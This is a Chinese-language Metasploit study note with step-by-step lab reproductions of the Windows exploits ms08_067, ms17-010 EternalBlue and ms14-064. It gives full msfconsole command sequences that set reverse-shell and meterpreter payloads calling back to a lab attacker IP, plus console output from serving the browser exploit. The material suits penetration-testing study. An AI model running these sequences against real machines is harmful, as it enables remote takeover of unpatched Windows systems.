Metasploit学习笔记

Metasploit学习笔记

0x0 ms08_067漏洞复现

---

1. search ms08_067
2. use exploit/windows/smb/ms08_067_netapi
3. show payloads
4. set payload generic/shell_reverse_tcp
5. show options
6. show targets
7. set RHOST 192.168.242.131 (攻击目标ip)
8. set LPORT 7777 (shell回连端口)
9. set LHOST 192.168.242.129 (shell回连ip)
10. set target 34 (设定攻击目标类型)
11. exploit (开始攻击)

或者payload设置成：
set payload windows/meterpreter/reverse_tcp

0x01 ms17-010 永恒之蓝漏洞复现

---

1. 先从网上下载最新的eploit到metasploit框架的目录下面

下载地址：
https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb

存放目录：
/usr/share/metasploit-framework/modules/exploits/windows/smb/

查看exploit使用要求：
需要安装ruby.smb

gem install ruby_smb

2. 开始使用模块 ：msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue"
3. 下面就是一般步骤了

0x02 查找指定系统平台漏洞命令

---

命令： search platform: windows xp sp3

0x03 windows7 ms14-064漏洞复现

---

步骤如下：

1. service postgresql start
2. msfconsole
3. search ms14
4. use exploit/windows/browser/ms14_064_ole_code_execution
5. set payload windows/meterpreter/reverse_tcp
6. set AllowPowershellPrompt true
7. set LHOST 192.168.242.129
8. set SRVHOST 192.168.242.129
9. exploit

exploit(ms14_064_ole_code_execution) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.242.129:4444 
[*] Using URL: http://192.168.242.129:8080/oGDKNQK3XUO
[*] Server started.
msf exploit(ms14_064_ole_code_execution) > [*] 192.168.242.1    ms14_064_ole_code_execution - Gathering target information.
[*] 192.168.242.1    ms14_064_ole_code_execution - Sending HTML response.
[*] 192.168.242.1    ms14_064_ole_code_execution - Sending exploit...
[*] 192.168.242.1    ms14_064_ole_code_execution - Sending exploit...
Interrupt: use the 'exit' command to quit
msf exploit(ms14_064_ole_code_execution) > 

靶机访问 ：http://192.168.242.129:8080/oGDKNQK3XUO
即可

复现成功，但是会被360拦截